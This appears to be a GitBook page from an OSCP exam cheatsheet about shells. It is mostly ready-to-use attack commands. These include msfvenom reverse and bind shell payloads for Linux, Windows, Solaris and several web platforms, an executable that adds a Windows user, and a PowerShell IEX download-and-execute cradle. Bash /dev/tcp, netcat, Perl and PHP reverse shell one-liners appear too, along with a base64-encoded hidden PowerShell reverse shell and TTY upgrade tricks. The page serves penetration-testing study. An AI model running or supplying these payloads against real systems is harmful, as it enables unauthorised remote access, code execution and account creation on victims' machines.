> For the complete documentation index, see [llms.txt](https://yongjun04.gitbook.io/oscp-cheatsheet/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://yongjun04.gitbook.io/oscp-cheatsheet/shells.md). # Shells ## Listener ```bash rlwrap -cAr nc -lnvp ``` ## Web Shells > Locate and upload appropriate shells from - /user/share/webshells *** ## Reverse Shells > Refer to[ https://www.revshells.com/](< https://www.revshells.com/>) *** ## Reverse Shells (MSFvenom) > **NOTE:** > > * **shell/reverse\_tcp = staged payload** > * **shell\_reverse\_tcp = unstaged payload** > * **staged payload requires meterpreter listener**

Formats

``` Framework Executable Formats [--format ] =============================================== Name ---- asp aspx aspx-exe axis2 dll ducky-script-psh elf elf-so exe exe-only exe-service exe-small hta-psh jar jsp loop-vbs macho msi msi-nouac osx-app psh psh-cmd psh-net psh-reflection python-reflection vba vba-exe vba-psh vbs war Framework Transform Formats [--format ] ============================================== Name ---- base32 base64 bash c csharp dw dword go golang hex java js_be js_le masm nim nimlang num octal perl pl powershell ps1 py python raw rb ruby rust rustlang sh vbapplication vbscript zig ```

### Linux

Reverse Shell

* 32-bit Systems {% code overflow="wrap" %} ```bash msfvenom -p linux/x86/shell/reverse_tcp LHOST= LPORT= -f > ``` {% endcode %} {% code overflow="wrap" %} ```bash msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT= -f > ``` {% endcode %} * 64-bit Systems {% code overflow="wrap" %} ```bash msfvenom -p linux/x64/shell/reverse_tcp LHOST= LPORT= -f > ``` {% endcode %} {% code overflow="wrap" %} ```bash msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT= -f > ``` {% endcode %}

Bind Shell

* 32-bit Systems {% code overflow="wrap" %} ```bash msfvenom -p linux/x86/meterpreter/bind_tcp RHOST= LPORT= -f > ``` {% endcode %} {% code overflow="wrap" %} ```bash msfvenom -p linux/x86/shell/bind_tcp RHOST= LPORT= -f > ``` {% endcode %} {% code overflow="wrap" %} ```bash msfvenom -p linux/x86/shell_bind_tcp RHOST= LPORT= -f > ``` {% endcode %} * 64-bit Systems {% code overflow="wrap" %} ```bash msfvenom -p linux/x64/meterpreter/bind_tcp RHOST= LPORT= -f > ``` {% endcode %} {% code overflow="wrap" %} ```bash msfvenom -p linux/x64/shell/bind_tcp RHOST= LPORT= -f > ``` {% endcode %} {% code overflow="wrap" %} ```bash msfvenom -p linux/x64/shell_bind_tcp RHOST= LPORT= -f > ``` {% endcode %}

### Windows

Reverse Shell

* 32-bit Systems {% code overflow="wrap" %} ```bash msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f > ``` {% endcode %} {% code overflow="wrap" %} ```bash msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f > ``` {% endcode %} * 64-bit Systems {% code overflow="wrap" %} ```bash msfvenom -p windows/x64/shell/reverse_tcp LHOST= LPORT= -f > ``` {% endcode %} {% code overflow="wrap" %} ```bash msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f > ``` {% endcode %}

Bind Shell

* 32-bit Systems {% code overflow="wrap" %} ```bash msfvenom -p windows/meterpreter/bind_tcp RHOST= LPORT= -f > ``` {% endcode %} {% code overflow="wrap" %} ```bash msfvenom -p windows/meterpreter_bind_tcp RHOST= LPORT= -f > ``` {% endcode %} {% code overflow="wrap" %} ```bash msfvenom -p windows/shell/bind_tcp RHOST= LPORT= -f > ``` {% endcode %} {% code overflow="wrap" %} ```bash msfvenom -p windows/shell_bind_tcp RHOST= LPORT= -f > ``` {% endcode %} * 64-bit Systems {% code overflow="wrap" %} ```bash msfvenom -p windows/x64/meterpreter/bind_tcp RHOST= LPORT= -f > ``` {% endcode %} {% code overflow="wrap" %} ```bash msfvenom -p windows/x64/meterpreter_bind_tcp RHOST= LPORT= -f > ``` {% endcode %} {% code overflow="wrap" %} ```bash msfvenom -p windows/x64/shell/bind_tcp RHOST= LPORT= -f > ``` {% endcode %} {% code overflow="wrap" %} ```bash msfvenom -p windows/x64/shell_bind_tcp RHOST= LPORT= -f > ``` {% endcode %}

Extras

* Run command via executable file {% code overflow="wrap" %} ```bash msfvenom -a [ x86 | x64 ] --platform Windows -p windows/exec CMD="" -f exe > payload.exe ``` {% endcode %} > **EXAMPLE:** > > **msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell "IEX(New-Object Net.webClient).downloadString('http\:///')"" -f exe > payload.exe** * Create User via executable file {% code overflow="wrap" %} ```bash msfvenom -p windows/adduser USER= PASS= -f exe > adduser.exe ``` {% endcode %}

### SunOS (Solaris) {% code overflow="wrap" %} ```bash msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST= LPORT= -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf ``` {% endcode %} *** ## Web-based Payloads ### PHP

Web Shell

```php ``` ```php ```

Reverse Shell

```php ') ?> ``` {% code overflow="wrap" %} ```bash msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php ``` {% endcode %}

### ASP\[X]

Web Shell

> Get from the following > > * /usr/share/webshells/aspx/cmdasp.aspx > * /usr/share/webshells/aspx/shell.aspx > > **NOTE: Remember to modify variables, string host and int port in shell.aspx**

Reverse Shell

{% code overflow="wrap" %} ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > reverse.asp ``` {% endcode %} {% code overflow="wrap" %} ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f aspx > reverse.aspx ``` {% endcode %}

### JSP {% code overflow="wrap" %} ```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw> reverse.jsp ``` {% endcode %} ### WAR {% code overflow="wrap" %} ```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > reverse.war ``` {% endcode %} ### NodeJS ```bash msfvenom -p nodejs/shell_reverse_tcp LHOST= LPORT= ``` *** ## Script Language Payloads ### Evil-WinRM > **NOTE:** > > * **Verify usability with: crackmapexec winrm \** > * **Look for port 5985 in nmap scans** ```bash evil-winrm -i -u -p ``` ```bash evil-winrm -i -u ``` ### Powercat.ps1 {% code overflow="wrap" %} ```powershell powershell -nop -w hidden IEX(New-Object System.Net.WebClient).DownloadString('http:///powercat.ps1') ``` {% endcode %} ```powershell powercat -c -p -e powershell ``` ### Perl {% code overflow="wrap" %} ```bash msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > reverse.pl ``` {% endcode %} {% code overflow="wrap" %} ```bash perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,":");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' ``` {% endcode %} ### Python {% code overflow="wrap" %} ```bash msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > reverse.py ``` {% endcode %} ### PHP ```php ') ?> ``` {% code overflow="wrap" %} ```bash php -r '$sock=fsockopen("",);exec("/bin/sh -i <&3 >&3 2>&3");' ``` {% endcode %} ### Bash > **NOTE: Create a .sh file and paste the following** > > ```bash > #!/bin/bash > /bin/bash -c "bash -i >& /dev/tcp// 0>&1" > ``` ### Netcat * Linux ```bash nc -nv -e /bin/bash ``` ```bash nc -nv -e /bin/sh ``` ```bash nc -nv -c /bin/bash ``` ```bash nc -nv -c /bin/sh ``` * Windows ```sh nc64.exe -e cmd ``` ```sh nc64.exe -e powershell ``` ```sh nc64.exe -t -e cmd ``` ```sh nc64.exe -t -e powershell ``` ### PowerShell > Do the following in Kali's *pwsh* {% code overflow="wrap" %} ```powershell $Text = '$client = New-Object System.Net.Sockets.TCPClient("", );$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text) $EncodedText =[Convert]::ToBase64String($Bytes) $EncodedText ``` {% endcode %} > Create the following python script and run it {% code overflow="wrap" %} ```python import sys import base64 payload = '$client = New-Object System.Net.Sockets.TCPClient("",);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode() print(cmd) ``` {% endcode %} ## TTY Shell > **NOTE: Sometime we get a reverse shell and it may not be fully functional. The following commands allow us to spawn proper shell.** ### Python ```python python -c 'import pty; pty.spawn("/bin/sh")' ``` ```python python3 -c 'import pty;pty.spawn("/bin/bash")'; export TERM=xterm-256color ``` ### Bash ```bash echo os.system('/bin/bash') ``` ```bash /bin/sh -i ``` ```bash /bin/bash -i ``` ```bash script -qc /bin/bash /dev/null ``` ### Perl ```perl perl -e 'exec "/bin/sh";' ``` ```perl exec "/bin/sh"; ``` ### Ruby ```ruby exec "/bin/sh" ``` ### Lua ```lua os.execute('/bin/sh') ``` ### IRB ```ruby exec "/bin/sh" ``` ### Vi ```vim :!bash ``` ```vim :set shell=/bin/bash:shell ``` ### Nmap: ```bash !sh ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://yongjun04.gitbook.io/oscp-cheatsheet/shells.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.